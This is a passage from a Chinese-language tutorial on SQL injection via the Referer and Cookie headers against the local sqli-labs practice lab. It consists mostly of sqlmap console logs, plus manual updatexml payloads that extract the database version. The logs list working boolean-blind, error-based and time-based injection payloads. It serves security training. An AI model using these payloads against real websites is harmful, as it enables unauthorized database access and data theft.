[13:18:29] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Referer #1*' might be vulnerable to cross-site scripting (XSS) attacks
[13:18:29] [INFO] testing for SQL injection on (custom) HEADER parameter 'Referer #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[13:18:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:18:31] [WARNING] reflective value(s) found and filtering out
[13:18:49] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:18:53] [INFO] testing 'Generic inline queries'
[13:18:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:20:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:21:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[13:23:01] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:23:52] [INFO] (custom) HEADER parameter 'Referer #1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="not")
[13:23:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:23:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:23:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:23:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:24:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[13:24:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[13:24:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:24:06] [INFO] (custom) HEADER parameter 'Referer #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[13:24:06] [INFO] testing 'MySQL inline queries'
[13:24:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:24:10] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[13:24:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[13:24:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[13:24:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[13:24:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[13:24:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:24:37] [INFO] (custom) HEADER parameter 'Referer #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[13:24:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:24:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:25:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:26:02] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[13:26:47] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[13:27:27] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[13:28:08] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[13:28:49] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[13:29:29] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[13:30:10] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[13:30:51] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[13:31:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
(custom) HEADER parameter 'Referer #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 400 HTTP(s) requests:
---
Parameter: Referer #1* ((custom) HEADER)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/sqli-labs/Less-19/' RLIKE (SELECT (CASE WHEN (1118=1118) THEN 0x687474703a2f2f3132372e302e302e312f73716c692d6c6162732f4c6573732d31392f ELSE 0x28 END)) AND 'dFqT'='dFqT
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1/sqli-labs/Less-19/' AND (SELECT 8908 FROM(SELECT COUNT(*),CONCAT(0x7162767071,(SELECT (ELT(8908=8908,1))),0x71706a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XYkp'='XYkp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/sqli-labs/Less-19/' AND (SELECT 1215 FROM (SELECT(SLEEP(5)))FoGI) AND 'SBOH'='SBOH
---
[13:32:12] [INFO] the back-end DBMS is MySQL
[13:32:12] [INFO] fetching banner
[13:32:22] [INFO] retrieved: '5.5.53'
[13:32:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.5.53'
[13:32:33] [INFO] fetched data logged to text files under 'XXX\sqlmap\output\127.0.0.1'
[*] ending @ 13:32:33 /2020-03-10/
显然,此时探测到注入点,说明post参数请求不存在注入点。
也可以将Referer设为*,即
…
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: *
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
…
再次进行测试,打印:
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:54:22 /2020-03-10/
[18:54:22] [INFO] parsing HTTP request from 'XXXX\target.txt'
[18:54:22] [INFO] found a total of 2 targets
URL 1:
GET http://127.0.0.1:80/sqli-labs/Less-19/
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
do you want to test this URL? [Y/n/q]
> Y
[18:54:23] [INFO] testing URL 'http://127.0.0.1:80/sqli-labs/Less-19/'
[18:54:23] [WARNING] detected empty POST body
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[18:54:23] [INFO] using 'XXX\sqlmap\output\results-03102020_0654pm.csv' as the CSV results file in multiple targets mode
[18:54:23] [INFO] testing connection to the target URL
[18:54:25] [INFO] testing if the target URL content is stable
[18:54:27] [INFO] target URL content is stable
[18:54:27] [INFO] testing if (custom) HEADER parameter 'Referer #1*' is dynamic
[18:54:29] [WARNING] (custom) HEADER parameter 'Referer #1*' does not appear to be dynamic
[18:54:31] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Referer #1*' might not be injectable
[18:54:33] [INFO] testing for SQL injection on (custom) HEADER parameter 'Referer #1*'
[18:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:55:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:55:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[18:56:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:56:02] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[18:56:04] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[18:56:07] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[18:56:09] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[18:56:11] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[18:56:53] [INFO] testing 'Generic inline queries'
[18:56:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:57:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:58:00] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:58:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:58:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[18:58:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[18:58:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:59:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:00:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:00:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:01:42] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:02:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:02:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:02:28] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:02:33] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:02:37] [INFO] testing 'MySQL inline queries'
[19:02:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:03:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:03:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:04:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:04:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[19:05:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[19:05:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[19:06:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[19:06:59] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[19:07:41] [INFO] testing 'MySQL AND time-based blind (ELT)'
[19:08:24] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[19:08:26] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[19:08:28] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[19:08:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:09:57] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:11:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:12:47] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[19:14:13] [WARNING] (custom) HEADER parameter 'Referer #1*' does not seem to be injectable
[19:14:13] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next URL
URL 2:
GET http://127.0.0.1/sqli-labs/Less-19/
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
do you want to test this URL? [Y/n/q]
> Y
'19:14:13] [INFO] testing URL 'http://127.0.0.1/sqli-labs/Less-19/
[19:14:13] [WARNING] detected empty POST body
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:14:13] [INFO] testing connection to the target URL
[19:14:15] [INFO] testing if the target URL content is stable
[19:14:17] [INFO] target URL content is stable
[19:14:17] [INFO] ignoring Cookie parameter 'csrftoken'
[19:14:17] [INFO] testing if parameter 'User-Agent' is dynamic
[19:14:19] [WARNING] parameter 'User-Agent' does not appear to be dynamic
[19:14:21] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable
[19:14:23] [INFO] testing for SQL injection on parameter 'User-Agent'
[19:14:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[19:15:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[19:15:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:15:52] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[19:15:55] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[19:15:57] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[19:15:59] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[19:16:01] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[19:16:43] [INFO] testing 'Generic inline queries'
[19:16:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:17:08] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:17:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[19:18:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:18:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[19:18:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:18:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:19:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:20:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:20:49] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:21:31] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:22:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:22:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:22:18] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:22:22] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:22:26] [INFO] testing 'MySQL inline queries'
[19:22:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:22:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:23:33] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:23:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:24:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[19:25:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[19:25:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[19:26:05] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[19:26:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[19:27:31] [INFO] testing 'MySQL AND time-based blind (ELT)'
[19:28:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[19:28:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[19:28:17] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[19:28:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:29:47] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:31:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:32:37] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[19:34:02] [WARNING] parameter 'User-Agent' does not seem to be injectable
[19:34:02] [INFO] testing if parameter 'Referer' is dynamic
[19:34:04] [WARNING] parameter 'Referer' does not appear to be dynamic
[19:34:06] [WARNING] heuristic (basic) test shows that parameter 'Referer' might not be injectable
[19:34:08] [INFO] testing for SQL injection on parameter 'Referer'
[19:34:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:34:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[19:35:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[19:35:36] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:35:38] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[19:35:40] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[19:35:42] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[19:35:44] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[19:35:46] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[19:36:29] [INFO] testing 'Generic inline queries'
[19:36:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:36:53] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:37:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[19:38:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:38:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[19:38:26] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[19:38:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:39:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[19:39:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[19:40:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:41:17] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[19:41:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[19:42:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[19:42:03] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:42:07] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[19:42:12] [INFO] testing 'MySQL inline queries'
[19:42:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:42:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:43:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:43:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:44:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[19:45:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[19:45:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[19:45:51] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[19:46:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[19:47:16] [INFO] testing 'MySQL AND time-based blind (ELT)'
[19:47:58] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[19:48:00] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[19:48:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[19:48:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:49:32] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[19:50:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:52:22] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[19:53:47] [WARNING] parameter 'Referer' does not seem to be injectable
[19:53:47] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next URL
[19:53:47] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'XXX\sqlmap\output\results-03102020_0654pm.csv'
[*] ending @ 19:53:47 /2020-03-10/
4.HTTP头中的SQL注入-cookie注入
服务器可以利用cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。
cookies最经典的应用就是判断用户是否已经登录网站。
在浏览器的console中查看cookie信息:
可以看到百度招聘的信息 ,是不是感觉逼格满满 !!!
在实际中,代码中使用Cookie传递参数,但是没有对Cookie中传递的参数进行过滤操作,导致SQL注入漏洞的产生。
进行测试,如下:
得到报错信息:
‘‘admin’’ LIMIT 0,1’
修改为' and updatexml(1,concat(0x7e,version(),0x7e),1) --+,加入cookie再次测试:
显然,此时通过页面的回显得到了数据库的版本。
还可以通过'and updatexml(1,concat(0x7e,database()',0x7e),1) --+得到数据库的版本。
sqlmap安全测试
通过文件指定注入点为cookie并保存文件的操作如下:
通过*标注注入点为cookie参数,如Cookie: uname=admin*; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF,然后进行测试:
python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt --banner --batch --level 3
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:08:36 /2020-03-10/
[14:08:36] [INFO] parsing HTTP request from 'XXXX\target.txt'
[14:08:37] [INFO] found a total of 2 targets
URL 1:
GET http://127.0.0.1:80/sqli-labs/Less-20/index.php
Cookie: uname=admin*; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
do you want to test this URL? [Y/n/q]
> Y
[14:08:37] [INFO] testing URL 'http://127.0.0.1:80/sqli-labs/Less-20/index.php'
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[14:08:37] [INFO] using 'XXX\sqlmap\output\results-03102020_0208pm.csv' as the CSV results file in multiple targets mode
[14:08:37] [INFO] testing connection to the target URL
[14:08:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:08:41] [INFO] testing if the target URL content is stable
[14:08:43] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[14:08:43] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[14:08:45] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be dynamic
[14:08:47] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might be injectable (possible DBMS: 'MySQL')
[14:08:49] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Cookie #1*' might be vulnerable to cross-site scripting (XSS) attacks
[14:08:49] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[14:08:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:08:51] [WARNING] reflective value(s) found and filtering out
[14:08:59] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:08:59] [INFO] testing 'Generic inline queries'
[14:09:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:09:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:09:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:09:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:09:09] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:09:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:09:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:09:16] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[14:09:16] [INFO] testing 'MySQL inline queries'
[14:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:09:18] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[14:09:46] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[14:09:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[14:09:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[14:09:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:09:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:09:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:10:12] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[14:10:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:10:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:10:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:10:24] [INFO] target URL appears to have 3 columns in query
[14:10:39] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: uname=admin' AND 5923=5923-- pgYe; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin' AND (SELECT 6510 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6510=6510,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BsUL; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 5241 FROM (SELECT(SLEEP(5)))QgDY)-- Yovg; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
